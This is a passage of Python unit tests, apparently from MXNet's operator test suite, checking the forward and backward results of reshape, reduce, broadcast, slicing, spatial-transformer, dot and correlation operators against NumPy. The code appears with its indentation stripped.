assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0].asnumpy(), groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd.asnumpy(), grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad.asnumpy(), grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
dtypes = ['float32', 'float64']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'].asnumpy(),
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'].asnumpy(),
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0].asnumpy(), forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
